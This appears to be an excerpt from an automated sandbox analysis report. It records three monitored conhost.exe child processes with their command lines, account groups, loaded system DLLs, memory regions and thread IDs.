"\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2283 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2284 start_va = 0xa84cdb0000 end_va = 0xa84cdcffff entry_point = 0x0 region_type = private name = "private_0x000000a84cdb0000" filename = "" Region: id = 2285 start_va = 0xa84cdd0000 end_va = 0xa84cde3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a84cdd0000" filename = "" Region: id = 2286 start_va = 0xa84cdf0000 end_va = 0xa84ce2ffff entry_point = 0x0 region_type = private name = "private_0x000000a84cdf0000" filename = "" Region: id = 2287 start_va = 0x7df5ffbb0000 end_va = 0x7ff5ffbaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffbb0000" filename = "" Region: id = 2288 start_va = 0x7ff6c4690000 end_va = 0x7ff6c46b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4690000" filename = "" Region: id = 2289 start_va = 0x7ff6c46b8000 end_va = 0x7ff6c46b8fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c46b8000" filename = "" Region: id = 2290 start_va = 0x7ff6c46be000 end_va = 0x7ff6c46bffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c46be000" filename = "" Region: id = 2291 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2292 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2293 start_va = 0xa84d020000 end_va = 0xa84d11ffff entry_point = 0x0 region_type = private name = "private_0x000000a84d020000" filename = "" Region: id = 2294 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2295 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3082 start_va = 0xa84cdb0000 end_va = 0xa84cdbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a84cdb0000" filename = "" Region: id = 3083 start_va = 0xa84cdc0000 end_va = 0xa84cdc6fff entry_point = 0x0 region_type = private name = "private_0x000000a84cdc0000" filename = "" Region: id = 3084 start_va = 0xa84ce30000 end_va = 0xa84ceedfff entry_point = 0xa84ce30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3085 start_va = 0xa84cef0000 end_va = 0xa84cf2ffff entry_point = 0x0 region_type = private name = "private_0x000000a84cef0000" filename = "" Region: id = 3086 start_va = 0xa84cf30000 end_va = 0xa84cf30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a84cf30000" filename = "" Region: id = 3087 start_va = 0xa84cf40000 end_va = 0xa84cf46fff entry_point = 0x0 region_type = private name = "private_0x000000a84cf40000" filename = "" Region: id = 3088 start_va = 0xa84cf50000 end_va = 0xa84cf50fff entry_point = 0x0 region_type = private name = "private_0x000000a84cf50000" filename = "" Region: id = 3089 start_va = 0xa84cf60000 end_va = 0xa84cf60fff entry_point = 0x0 region_type = private name = "private_0x000000a84cf60000" filename = "" Region: id = 3090 start_va = 0xa84d120000 end_va = 0xa84d2a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a84d120000" filename = "" Region: id = 3091 start_va = 0xa84d2b0000 end_va = 0xa84d2bffff entry_point = 0x0 region_type = private name = "private_0x000000a84d2b0000" filename = "" Region: id = 3092 start_va = 0xa84d2c0000 end_va = 0xa84d440fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a84d2c0000" filename = "" Region: id = 3093 start_va = 0xa84d450000 end_va = 0xa84e84ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a84d450000" filename = "" Region: id = 3094 start_va = 0x7ff6c4590000 end_va = 0x7ff6c468ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4590000" filename = "" Region: id = 3095 start_va = 0x7ff6c46bc000 end_va = 0x7ff6c46bdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c46bc000" filename = "" Region: id = 3096 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3097 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3098 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3099 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3100 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3101 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3102 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3103 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3104 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3105 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3106 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3107 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4399 start_va = 0xa84cf70000 end_va = 0xa84cfaffff entry_point = 0x0 region_type = private name = "private_0x000000a84cf70000" filename = "" Region: id = 4400 start_va = 0xa84cfb0000 end_va = 0xa84cfeffff entry_point = 0x0 region_type = private name = "private_0x000000a84cfb0000" filename = "" Region: id = 4401 start_va = 0xa84d010000 end_va = 0xa84d01ffff entry_point = 0x0 region_type = private name = "private_0x000000a84d010000" filename = "" Region: id = 4402 start_va = 0xa84e850000 end_va = 0xa84eb86fff entry_point = 0xa84e850000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4403 start_va = 0xa84eb90000 end_va = 0xa84edabfff entry_point = 0x0 region_type = private name = "private_0x000000a84eb90000" filename = "" Region: id = 4404 start_va = 0xa84edb0000 end_va = 0xa84efc3fff entry_point = 0x0 region_type = private name = "private_0x000000a84edb0000" filename = "" Region: id = 4405 start_va = 0xa84efd0000 end_va = 0xa84f0dafff entry_point = 0x0 region_type = private name = "private_0x000000a84efd0000" filename = "" Region: id = 4406 start_va = 0xa84f0e0000 end_va = 0xa84f2f5fff entry_point = 0x0 region_type = private name = "private_0x000000a84f0e0000" filename = "" Region: id = 4407 start_va = 0xa84f300000 end_va = 0xa84f40afff entry_point = 0x0 region_type = private name = "private_0x000000a84f300000" filename = "" Region: id = 4408 start_va = 0x7ff6c46ba000 end_va = 0x7ff6c46bbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c46ba000" filename = "" Region: id = 4409 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4410 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4411 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4412 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4413 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4414 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4415 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4416 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4417 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 146 os_tid = 0xf7c Thread: id = 191 os_tid = 0x77c Thread: id = 227 os_tid = 0x1090 Thread: id = 293 os_tid = 0x11c4 Process: id = "116" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xfb33000" os_pid = "0xf80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "73" os_parent_pid = "0xe1c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2296 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2297 start_va = 0xd943f0000 end_va = 0xd9440ffff entry_point = 0x0 region_type = private name = "private_0x0000000d943f0000" filename = "" Region: id = 2298 start_va = 0xd94410000 end_va = 0xd94423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000d94410000" filename = "" Region: id = 2299 start_va = 0xd94430000 end_va = 0xd9446ffff entry_point = 0x0 region_type = private name = "private_0x0000000d94430000" filename = "" Region: id = 2300 start_va = 0x7df5ffe00000 end_va = 0x7ff5ffdfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffe00000" filename = "" Region: id = 2301 start_va = 0x7ff6c4620000 end_va = 0x7ff6c4642fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4620000" filename = "" Region: id = 2302 start_va = 0x7ff6c464a000 end_va = 0x7ff6c464afff entry_point = 0x0 region_type = private name = "private_0x00007ff6c464a000" filename = "" Region: id = 2303 start_va = 0x7ff6c464e000 end_va = 0x7ff6c464ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c464e000" filename = "" Region: id = 2304 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2305 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2306 start_va = 0xd94580000 end_va = 0xd9467ffff entry_point = 0x0 region_type = private name = "private_0x0000000d94580000" filename = "" Region: id = 2307 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2308 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2770 start_va = 0xd943f0000 end_va = 0xd943fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000d943f0000" filename = "" Region: id = 2771 start_va = 0xd94400000 end_va = 0xd94406fff entry_point = 0x0 region_type = private name = "private_0x0000000d94400000" filename = "" Region: id = 2772 start_va = 0xd94470000 end_va = 0xd9452dfff entry_point = 0xd94470000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2773 start_va = 0xd94530000 end_va = 0xd9456ffff entry_point = 0x0 region_type = private name = "private_0x0000000d94530000" filename = "" Region: id = 2774 start_va = 0xd94570000 end_va = 0xd94570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000d94570000" filename = "" Region: id = 2775 start_va = 0xd94680000 end_va = 0xd94686fff entry_point = 0x0 region_type = private name = "private_0x0000000d94680000" filename = "" Region: id = 2776 start_va = 0xd94690000 end_va = 0xd94690fff entry_point = 0x0 region_type = private name = "private_0x0000000d94690000" filename = "" Region: id = 2777 start_va = 0xd946a0000 end_va = 0xd946a0fff entry_point = 0x0 region_type = private name = "private_0x0000000d946a0000" filename = "" Region: id = 2778 start_va = 0xd947a0000 end_va = 0xd947affff entry_point = 0x0 region_type = private name = "private_0x0000000d947a0000" filename = "" Region: id = 2779 start_va = 0xd947b0000 end_va = 0xd94937fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000d947b0000" filename = "" Region: id = 2780 start_va = 0xd94940000 end_va = 0xd94ac0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000d94940000" filename = "" Region: id = 2781 start_va = 0xd94ad0000 end_va = 0xd95ecffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000d94ad0000" filename = "" Region: id = 2782 start_va = 0x7ff6c4520000 end_va = 0x7ff6c461ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4520000" filename = "" Region: id = 2783 start_va = 0x7ff6c464c000 end_va = 0x7ff6c464dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c464c000" filename = "" Region: id = 2784 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2785 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2786 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2787 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2788 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2789 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2790 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2791 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2792 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2793 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2794 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2795 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4638 start_va = 0xd946b0000 end_va = 0xd946bffff entry_point = 0x0 region_type = private name = "private_0x0000000d946b0000" filename = "" Region: id = 4639 start_va = 0xd946c0000 end_va = 0xd946fffff entry_point = 0x0 region_type = private name = "private_0x0000000d946c0000" filename = "" Region: id = 4640 start_va = 0xd95f90000 end_va = 0xd95f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000d95f90000" filename = "" Region: id = 4641 start_va = 0xd95fa0000 end_va = 0xd962d6fff entry_point = 0xd95fa0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4642 start_va = 0xd962e0000 end_va = 0xd964fafff entry_point = 0x0 region_type = private name = "private_0x0000000d962e0000" filename = "" Region: id = 4643 start_va = 0xd96500000 end_va = 0xd96716fff entry_point = 0x0 region_type = private name = "private_0x0000000d96500000" filename = "" Region: id = 4644 start_va = 0xd96720000 end_va = 0xd96834fff entry_point = 0x0 region_type = private name = "private_0x0000000d96720000" filename = "" Region: id = 4645 start_va = 0xd96840000 end_va = 0xd96a52fff entry_point = 0x0 region_type = private name = "private_0x0000000d96840000" filename = "" Region: id = 4646 start_va = 0xd96a60000 end_va = 0xd96b72fff entry_point = 0x0 region_type = private name = "private_0x0000000d96a60000" filename = "" Region: id = 4647 start_va = 0x7ff6c4648000 end_va = 0x7ff6c4649fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4648000" filename = "" Region: id = 4648 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4649 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4650 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4651 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4652 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4653 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4654 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4655 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4656 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 147 os_tid = 0xf84 Thread: id = 192 os_tid = 0x6ac Thread: id = 216 os_tid = 0x1064 Thread: id = 305 os_tid = 0x11f4 Process: id = "117" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xfc7d000" os_pid = "0xf88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "74" os_parent_pid = "0xe24" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2309 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2310 start_va = 0xf38a1a0000 end_va = 0xf38a1bffff entry_point = 0x0 region_type = private name = "private_0x000000f38a1a0000" filename = "" Region: id = 2311 start_va = 0xf38a1c0000 end_va = 0xf38a1d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f38a1c0000" filename = "" Region: id = 2312 start_va = 0xf38a1e0000 end_va = 0xf38a21ffff entry_point = 0x0 region_type = private name = "private_0x000000f38a1e0000" filename = "" Region: id = 2313 start_va = 0x7df5ffe40000 end_va = 0x7ff5ffe3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffe40000" filename = "" Region: id = 2314 start_va = 0x7ff6c4020000 end_va = 0x7ff6c4042fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4020000" filename = "" Region: id = 2315 start_va = 0x7ff6c404d000 end_va = 0x7ff6c404efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c404d000" filename = "" Region: id = 2316 start_va = 0x7ff6c404f000 end_va = 0x7ff6c404ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c404f000" filename = "" Region: id = 2317 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2318 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2319 start_va = 0xf38a270000 end_va = 0xf38a36ffff entry_point = 0x0 region_type = private name = "private_0x000000f38a270000" filename = "" Region: id = 2320 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2321 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2744 start_va = 0xf38a1a0000 end_va = 0xf38a1affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f38a1a0000" filename = "" Region: id = 2745 start_va = 0xf38a1b0000 end_va = 0xf38a1b6fff entry_point = 0x0 region_type = private name = "private_0x000000f38a1b0000" filename = "" Region: id = 2746 start_va = 0xf38a220000 end_va = 0xf38a25ffff entry_point = 0x0 region_type = private name = "private_0x000000f38a220000" filename = "" Region: id = 2747 start_va = 0xf38a260000 end_va = 0xf38a260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f38a260000" filename = "" Region: id = 2748 start_va = 0xf38a370000 end_va = 0xf38a42dfff entry_point = 0xf38a370000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2749 start_va = 0xf38a430000 end_va = 0xf38a436fff entry_point = 0x0 region_type = private name = "private_0x000000f38a430000" filename = "" Region: id = 2750 start_va = 0xf38a440000 end_va = 0xf38a440fff entry_point = 0x0 region_type = private name = "private_0x000000f38a440000" filename = "" Region: id = 2751 start_va = 0xf38a450000 end_va = 0xf38a450fff entry_point = 0x0 region_type = private name = "private_0x000000f38a450000" filename = "" Region: id = 2752 start_va = 0xf38a510000 end_va = 0xf38a51ffff entry_point = 0x0 region_type = private name = "private_0x000000f38a510000" filename = "" 